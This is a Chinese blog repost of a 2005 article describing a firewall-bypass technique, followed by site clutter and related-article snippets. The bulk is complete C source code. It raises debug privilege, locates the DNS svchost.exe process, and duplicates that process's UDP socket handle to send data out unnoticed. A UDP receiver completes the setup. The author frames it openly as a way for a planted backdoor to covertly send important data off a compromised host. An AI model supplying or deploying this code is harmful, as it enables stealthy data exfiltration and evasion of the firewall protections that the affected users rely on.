一种新的穿透防火墙的数据传输技术

最新推荐文章于 2025-02-17 16:19:55 发布
最新推荐文章于 2025-02-17 16:19:55 发布
阅读量796 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 技术文档 文章标签: 防火墙 socket null dll service token
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Hkiller/article/details/573740
本文介绍了一种绕过防火墙限制的方法,通过控制DNS进程(svchost.exe)中的UDP套接字来实现隐蔽的数据传输。该技术适用于需要将数据悄悄传出目标主机的场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章作者:ZwelL

使用该技术背景:
在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况"严重"不推荐使用该技术(后面我会讲到为什么).

  针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.
相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单:
将其他进程中允许数据传输的套接字句柄拿为已用.过程如下:

1. 找出目标进程
2. 找出SOCKET句柄
2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用.
3. 用转换后的SOCKET进行数据传输

  上面的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论).而且从上面的实现方法也
可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP.
针对不同系统不同进程我们很难定位一个稳定的进程SOCKET.

  看到上面这些,你有点丧气了对不对,哈哈. 再想一想,其实我们有一条真正的通罗马的"黄金大道".

  我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS.你能想像域名解析数据都被
拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀...

下面是通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子.
编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等.
具体解决方法请细看注释部分...
CODE:
/*++

Made By ZwelL
[email]zwell@sohu.com[/email]
2005.4.12
--*/

#include <winsock2.h>
#include <stdio.h>
#include <wtsapi32.h>

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status)       ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef LONG   NTSTATUS;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
  ULONG         ProcessId;
  UCHAR         ObjectTypeNumber;
  UCHAR         Flags;
  USHORT         Handle;
  PVOID         Object;
  ACCESS_MASK     GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

BOOL LocateNtdllEntry ( void )
{
  BOOL   ret       = FALSE;
  char   NTDLL_DLL[] = "ntdll.dll";
  HMODULE ntdll_dll   = NULL;


  if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
  {
    printf( "GetModuleHandle() failed");
    return( FALSE );
  }
  if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )
  {
    goto LocateNtdllEntry_exit;
  }
  ret = TRUE;

LocateNtdllEntry_exit:

  if ( FALSE == ret )
  {
    printf( "GetProcAddress() failed");
  }
  ntdll_dll = NULL;
  return( ret );
}


/*++
This routine is used to get a process's username from it's SID
--*/
BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)
{
  // sanity checks and default value
  if (pUserSid == NULL)
    return false;
  strcpy(szUserName, "?");

  SID_NAME_USE   snu;
  TCHAR       szUser[_MAX_PATH];
  DWORD       chUser = _MAX_PATH;
  PDWORD       pcchUser = &chUser;
  TCHAR       szDomain[_MAX_PATH];
  DWORD       chDomain = _MAX_PATH;
  PDWORD       pcchDomain = &chDomain;

  // Retrieve user name and domain name based on user's SID.
  if (
    ::LookupAccountSid(
    NULL,
    pUserSid,
    szUser,
    pcchUser,
    szDomain,
    pcchDomain,
    &snu
    )
    )
  {
    wsprintf(szUserName, "%s", szUser);
  }
  else
  {
    return false;
  }

  return true;
}


/*++

This routine is used to get the DNS process's Id

Here, I use WTSEnumerateProcesses to get process user Sid,
and then get the process user name. Beacause as it's a "NETWORK SERVICE",
we cann't use OpenProcessToken to catch the DNS process's token information,
even if we has the privilege in catching the SYSTEM's.

--*/
DWORD GetDNSProcessId()
{
  PWTS_PROCESS_INFO pProcessInfo = NULL;
  DWORD         ProcessCount = 0;
  char         szUserName[255];
  DWORD         Id = -1;

  if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))
  {
    // dump each process description
    for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)
    {

        if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )
        {
          GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);
          if( strcmp(szUserName, "NETWORK SERVICE") == 0)
          {
            Id = pProcessInfo[CurrentProcess].ProcessId;
            break;
          }
        }
    }

    WTSFreeMemory(pProcessInfo);
  }

  return Id;
}


/*++
This doesn't work as we know, sign...
but you can use the routine for other useing...
--*/
/*
BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)
{
  HANDLE hProcess = NULL,
        hAccessToken = NULL;
  TCHAR InfoBuffer[1000], szDomainName[200];
  PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
  DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;
  SID_NAME_USE snu;

  hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);
  if(hProcess == NULL)
  {
    printf("OpenProcess wrong");
    CloseHandle(hProcess);
    return false;
  }

  if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))
  {
    printf("OpenProcessToken wrong:%08x", GetLastError());
    return false;
  }

  GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,
    1000, &dwInfoBufferSize);

  LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,
    &dwAccountSize,szDomainName, &dwDomainSize, &snu);

  if(hProcess)
    CloseHandle(hProcess);
  if(hAccessToken)
    CloseHandle(hAccessToken);
  return true;
}*/


/*++
Now, it is the most important stuff... ^_^
--*/
SOCKET GetSocketFromId (DWORD PID)
{
  NTSTATUS               status;
  PVOID                 buf   = NULL;
  ULONG                 size = 1;
  ULONG                 NumOfHandle = 0;
  ULONG                 i;
  PSYSTEM_HANDLE_INFORMATION   h_info = NULL;
  HANDLE   sock = NULL;
  DWORD   n;

  buf=malloc(0x1000);
  if(buf == NULL)
  {
    printf("malloc wrong/n");
    return NULL;
  }
  status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );
  if(STATUS_INFO_LENGTH_MISMATCH == status)
  {
    free(buf);
    buf=malloc(n);
    if(buf == NULL)
    {
        printf("malloc wrong/n");
        return NULL;
    }
    status = ZwQuerySystemInformation( 0x10, buf, n, NULL);
  }
  else
  {
    printf("ZwQuerySystemInformation wrong/n");
    return NULL;
  }

  NumOfHandle = *(ULONG*)buf;

  h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

  for(i = 0; i<NumOfHandle ;i++)
  {
    try
    {
        if( ( h_info[i].ProcessId == PID ) && ( h_info[i].ObjectTypeNumber == 0x1c )
          && (h_info[i].Handle!=0x2c)   // I don't know why if the Handle equal to 0x2c, in my test, it stops at getsockname()
                            // So I jump over this situation...
                            // May be it's different in your system,
          ) //wind2000 is 0x1a
        {
          //printf("Handle:0x%x Type:%08x/n",h_info[i].Handle, h_info[i].ObjectTypeNumber);
          if( 0 == DuplicateHandle(
            OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),
            (HANDLE)h_info[i].Handle,
            GetCurrentProcess(),
            &sock,
            STANDARD_RIGHTS_REQUIRED,
            true,
            DUPLICATE_SAME_ACCESS)
            )
          {
            printf("DuplicateHandle wrong:%8x", GetLastError());
            continue;
          }

          //printf("DuplicateHandle ok/n");
          sockaddr_in name = {0};
          name.sin_family = AF_INET;
          int namelen = sizeof(sockaddr_in);
          getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );
          //printf("PORT=%5d/n",   ntohs( name.sin_port ));
          if(ntohs(name.sin_port)>0)   // if port > 0, then we can use it
            break;
        }
    }
    catch(...)
    {
        continue;
    }
  }

  if ( buf != NULL )
  {
    free( buf );
  }
  return (SOCKET)sock;
}


/*++
This is not required...
--*/
BOOL EnablePrivilege (PCSTR name)
{
  HANDLE hToken;
  BOOL rv;

  TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
  LookupPrivilegeValue (
    0,
    name,
    &priv.Privileges[0].Luid
    );

  priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

  OpenProcessToken(
    GetCurrentProcess (),
    TOKEN_ADJUST_PRIVILEGES,
    &hToken
    );

  AdjustTokenPrivileges (
    hToken,
    FALSE,
    &priv,
    sizeof priv,
    0,
    0
    );

  rv = GetLastError () == ERROR_SUCCESS;

  CloseHandle (hToken);
  return rv;
}

void main()
{
  WSADATA wsaData;
  char   testbuf[255];
  SOCKET   sock;
  sockaddr_in RecvAddr;

  int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
  if (iResult != NO_ERROR)
    printf("Error at WSAStartup()/n");

  if(!LocateNtdllEntry())
    return;

  if(!EnablePrivilege (SE_DEBUG_NAME))
  {
    printf("EnablePrivilege wrong/n");
    return;
  }

  sock = GetSocketFromId(GetDNSProcessId());
  if( sock==NULL)
  {
    printf("GetSocketFromId wrong/n");
    return;
  }

  //Change there value...
  RecvAddr.sin_family = AF_INET;
  RecvAddr.sin_port = htons(5555);
  RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");

  if(SOCKET_ERROR == sendto(sock,
        "test",
        5,
        0,
        (SOCKADDR *) &RecvAddr,
        sizeof(RecvAddr)))
  {
    printf("sendto wrong:%d/n", WSAGetLastError());
  }
  else
  {
    printf("send ok... Have fun, right? ^_^/n");
  }
 
  getchar();

  //WSACleanup();
  return;
}


很早以前我就有这个想法了,只是一直没有去实现.在上面的代码中,
因为要找出DNS进程句柄,而svchost.exe又有多个,所以以用户名来进行判断,本来是用OpenProcessToken,
但是怎么也不行,所以换个方法.用到了wtsapi32库函数.

再用下面的代码测试:

CODE:
/*++
UdpReceiver
--*/
#include <stdio.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

void main()
{
WSADATA wsaData;
SOCKET RecvSocket;
sockaddr_in RecvAddr;
int Port = 5555;
char RecvBuf[1024];
int BufLen = 1024;
sockaddr_in SenderAddr;
int SenderAddrSize = sizeof(SenderAddr);

//-----------------------------------------------
// Initialize Winsock
WSAStartup(MAKEWORD(2,2), &wsaData);

//-----------------------------------------------
// Create a receiver socket to receive datagrams
RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

//-----------------------------------------------
// Bind the socket to any address and the specified port.
RecvAddr.sin_family = AF_INET;
RecvAddr.sin_port = htons(Port);
RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);

bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));

//-----------------------------------------------
// Call the recvfrom function to receive datagrams
// on the bound socket.
printf("Receiving datagrams.../n");
while(1)
{
  recvfrom(RecvSocket,
    RecvBuf,
    BufLen,
    0,
    (SOCKADDR *)&SenderAddr,
    &SenderAddrSize);
  printf("%s/n", RecvBuf);
}

//-----------------------------------------------
// Close the socket when finished receiving datagrams
printf("Finished receiving. Closing socket./n");
closesocket(RecvSocket);

//-----------------------------------------------
// Clean up and exit.
printf("Exiting./n");
WSACleanup();
return;
}



测试步骤:
1. 在一台机器上执行UdpReceiver,
2. 在安装防火墙的机器上执行第一个程序.
SSH隧道:穿透企业防火墙的N种姿势
caishuangxi111的博客
05-22 759
想象公司的网络防火墙是一道安检门,所有进出包裹都要拆箱检查。当你试图访问家里的NAS或连接公司内网数据库时,就像试图把一只活猫塞进行李箱——常规方法肯定会被拦截。某次出差时,我通过酒店WiFi用SSH隧道连回公司内网,就像在安检门底下挖了条秘密地道。隔壁同事试图直连被防火墙阻断,只能对着屏幕干瞪眼。当你下次优雅地穿越防火墙时,就像网络世界的007——用技术智慧突破物理限制,但请记住:能力越大,责任越大。
防火墙DNS域名解析启用DNS透明代理
qq_42181623的博客
05-01 4427
拓扑介绍 LSW2、LSW3为公司A / B 部门的接入交换机 LSW1为公司的核心设备,负责DHCP地址下放 FW1为公司出接口设备,负责对接telecom Unicom给公司做域名解析 AR1、AR2模拟运营商的BASE设备 AR3模拟运营商的核心P设备 server1 、2 为telecom的服务器 server3 、4 为Unicom的服务器 配置思路 配置内网的连通性:接入设备vlan缺省(这里犯个懒当透明)、核心设备DHCP下放地址 出接口设备配置:新建区域、安全策...
穿透防火墙数据传输技术
09-25
穿透防火墙数据传输技术,提供相互学习。
一种新的穿透防火墙数据传输技术定义.pdf
03-04
一种新的穿透防火墙数据传输技术定义.pdf
一种新的穿透防火墙数据传输技术.htm
11-03
一种新的穿透防火墙数据传输技术.htm
基于NDIS的防火墙穿透通信技术研究实现
基于 NDIS 的防火墙穿透通信技术是指使用 NDIS、IMD TDI 三个层次来实现数据通信,绕过防火墙的限制,从而实现了防火墙穿透。这种技术可以应用于各种类型的防火墙,包括主流的防火墙产品。 防火墙穿透技术的...
Delphi实现P2P穿透防火墙的源码解析
3. NAT(Network Address Translation):网络地址转换是一种用于将一个IP地址域映射到另一个IP地址域的技术,常用于将私有网络地址转换为公共网络地址。它在网络设备(如路由器)上实现,使得多个设备可以通过单一...
DNS面临的4大技术变化
ipbaobao的专栏
11-23 422
    1. DNSSec,为DNS增加安全机制,但目前主要的问题是密钥的管理更新问题。    2. DNS for IPv6:为DNS增加对IPv6解析的支持。    3. IDN。国际化域名,刚刚批准,期待更大发展。    4. gTDL。不断增加个性化域名,但究竟多少是个够呢?
链路负载均衡之DNS透明代理
Mario_Ti的博客
03-04 2940
本文介绍链路负载均衡之DNS透明代理,首先介绍DNS透明代理概念、DNS透明代理策略,最后通过防火墙web界面以及对应指令配置。
DNS隧道+FRP隧道
snowman12138的博客
03-02 2519
DNS隧道,是隧道技术一种。当我们HTTP、HTTPS这样的上层协议、正反向端口转发都失败的时候,可以尝试DNS隧道。DNS隧道很难防范,因为平时的业务等功能难免会用到DNS协议进行解析,所以防火墙大多对DNS流量是放行的状态。这时候,如果我们在不出机器构造一个恶意的域名,本地DNS服务器无法给出回答时,就会以迭代查询的方式通过互联网定位到所查询域的权威DNS服务器。最后,这条DNS请求会落到我们提前搭建好的恶意DNS服务器上,于是乎,我们的不出网主机就恶意DNS服务器交流上了。
DNS透明部署
最新发布
2301_81140745的博客
02-17 591
防火墙上配置dns配置 使内网的DNS地址10.10.10.10出去后根据端口转去访问DNS地址100.1.1.1/200.1.1.1。只有一个客户端可以访问 并且有时为客户端1 有时为客户端2(后续完善)在外部DNS拿到www.baidu.com的地址后去访问百度服务器。通过智能选路 选取合适的路线访问。五.配置虚拟DNS实际DNS。实验成功了--------一半。
鹅厂网事:全局精确流量调度新思路-HttpDNS服务详解
charleslei的专栏
11-18 2696
小编:对于互联网,域名是访问的第一跳,而这一跳很多时候会“失足”,导致访问错误内容,失败连接等,让我们在互联网上畅游的爽快瞬间消失,而对于这关键的第一跳,鹅厂也在持续深入研究思考对策,今天小编就邀请了我们负责这块域名解析的好伙伴—廖伟健同学跟我们做一个分享。同时,今天小编也非常希望了解大伙对这块内容的感受,所以今天文中加入了投票功能,希望您投上神圣的一票哦。事不延迟,我们启程 ! 但凡
通信网络中的透传到底什么意思?
热门推荐
Dallin0408的博客
03-09 4万+
1、透传:指与传输网络的介质、调制解调方式、传输方式、传输协议无关的一种数据传送方式。这就好比快递邮件,邮件中间有可能通过自行车、汽车、火车、飞机的多种组合运输方式到达您的手上,但您不用关心它们中间经历了哪些。2、为什么要透传呢?透传一般都是用来读取远程的串口数据。例如:网吧内每个上网者都要刷身份证才能上网,但身份证数据库不可能放在每个网吧内。所以就将读卡器的串口数据通过透传回传到公安局,在公安局
国内外优秀公共DNS测评及推荐
Curtis’Blog
12-20 8873
DNS在平时上网中扮演重要角色,如果不注意DNS的话,可能会导致网速慢、弹窗广告、网址打不开、打开不是自己想要的网站、劫持等一系列问题。针对DNS的问题,今天我们就来总结一下,看看哪个DNS服务器最好用!注意:本测试仅通过奇云测对服务器进行综合测试,具体使用情况请以用户本地为主。建议使用ISP默认分配的DNS,只有在特别需要的情况下再使用公共DNS。 1.Public DNS+:★★★★★(推荐...
网络基础,带你了解TCP/UDP,轻松理解DNS
qq_59677112的博客
07-09 1395
该服务器记录各个网站ip与对应的域名;用于终端查询解析; 封装解封装速率 约等于 (带宽/8)*85%IPv4的报头结构 传输层:解决数据交给那个应用程序,端口字段,还需要解决传输的质量方法两种传输协议,对应不同的传输服务 TCPUDPTCP一种可靠的传输协议面向连接 速度慢 可靠传输(按需传输、有确认机制、丢失重传、严格校验) 20字节头UDP一种不可靠传输协议无连接 速度快 不可靠传输(只管传,其他都不管) 8字节头 其中ABC为单播地址 D类为组播地址 E类保留
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值